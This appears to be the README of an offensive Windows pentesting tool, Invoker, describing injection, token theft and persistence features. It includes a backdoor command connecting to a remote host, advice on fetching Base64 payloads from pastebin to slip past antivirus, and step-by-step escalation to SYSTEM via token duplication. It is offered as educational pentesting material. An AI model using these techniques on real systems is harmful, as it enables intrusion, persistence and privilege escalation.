Penetration testing utility, and antivirus assessment tool.
The main goal is to use this tool when access to some Windows OS features through GUI is restricted.
Built with Dev-C++ IDE v5.11 (64-bit), compiled with TDM-GCC v4.9.2 (32-bit and 64-bit) and tested on Windows 10 Enterprise OS (64-bit). Download Dev-C++ from here.
NEW: Visual Studio Community 2019 v16.7.6 projects added.
Dev-C++ project with C++03 standard is somehow stealthier than Visual Studio project with C++11 standard.
Made for educational purposes. I hope it will help!
Future plans:
- Direct System Calls,
- DLL Proxying,
- COM Hijacking.
- Invoker Library
- How to Run
- Bytecode Injection
- Generate a Reverse Shell Payload
- PowerShell Scripts
- Make a DLL With a Hook Procedure
- Get the LocalSystem Account (NT AUTHORITY\SYSTEM)
- Images
Capabilities:
- invoke the Command Prompt and PowerShell,
- download a file,
- add a registry key,
- schedule a task,
- Windows Management Instrumentation (WMI),
- connect to a remote host,
- terminate a running process,
- run a new process,
- dump a process memory,
- inject a bytecode into a running process,
- inject a DLL into a running process,
- list DLLs of a running process,
- install a hook procedure,
- enable access token privileges,
- duplicate the access token of a running process,
- list unquoted service paths and restart a running service,
- replace Sticky Keys.
Some features may require administrative privileges.
Check the library here. Feel free to use it!
Run \exec\Invoker_x86.exe (32-bit) or \exec\Invoker_x64.exe (64-bit).
To automate the backdoor while setting up a persistence, run the following command:
Invoker_x64.exe 192.168.8.5 9000
32-bit Invoker can only:
- dump the memory of a 32-bit process,
- inject a 32-bit bytecode into a 32-bit process,
- inject a 32-bit DLL into a 32-bit process,
- list DLLs of a 32-bit process,
- install a hook procedure from a 32-bit DLL.
64-bit Invoker can only:
- dump the memory of a 32-bit process,
- dump the memory of a 64-bit process,
- inject a 32-bit bytecode into a 32-bit process,
- inject a 64-bit bytecode into a 64-bit process,
inject a 32-bit DLL into a 32-bit process,- inject a 64-bit DLL into a 64-bit process,
list DLLs of a 32-bit process,- list DLLs of a 64-bit process.
install a hook procedure from a 32-bit DLL,- install a hook procedure from a 64-bit DLL.
Elevate privileges by injecting bytecode into a higher-privileged process.
This tool can parse an HTTP response and extract the payload from a custom element, e.g. from <invoker>payload</invoker>
where payload
is a binary code/file encoded in Base64.
Check the example at pastebin.com/raw/xf9Trt0d.
This might be useful if antivirus is constantly deleting your local payloads.
Also, check an additional example at pastebin.com/raw/iW17rCxH.
P.S. Bytecode provided will most certainly not work for you.
Use ngrok to give your local web server a public address.
Too see if a process is 32-bit or 64-bit open up Task Manager -> click on More details
-> go to Details
tab -> right click on any of the columns -> click on Select columns
-> check the Platform
checkbox.
Additionally, to see if a process is running with administrative privileges check the Elevated
checkbox.
Find out how to generate a reverse shell payload from my other project, as well as, find out how to set up an Ncat and multi/handler listeners.
Check all the PowerShell scripts used in the main C++ program here.
Find out how to make a DLL with a hook procedure here. The hook procedure will invoke a message box on each window close.
Also, check out a keyboard hook procedure here.
Make sure to remove all the created artifacts after you are done testing, e.g. remove keylogger.log
.
Run the Invoker as administrator.
Enable all access token privileges.
Duplicate the access token from e.g. Windows Logon Application (winlogon.exe) and run a new instance of the Invoker.
Within the new Invoker instance, open the Command Prompt and run whoami
, you should now see nt authority\system
.
Enable all access token privileges once again.
Close the old Invoker instance.
P.S. You get more access token privileges from Local Security Authority Subsystem Service (lsass.exe).
Figure 1 - Invoker
Figure 2 - Add/Edit Registry Key
Figure 3 - Bytecode Injection
Figure 4 - Elevated Privileges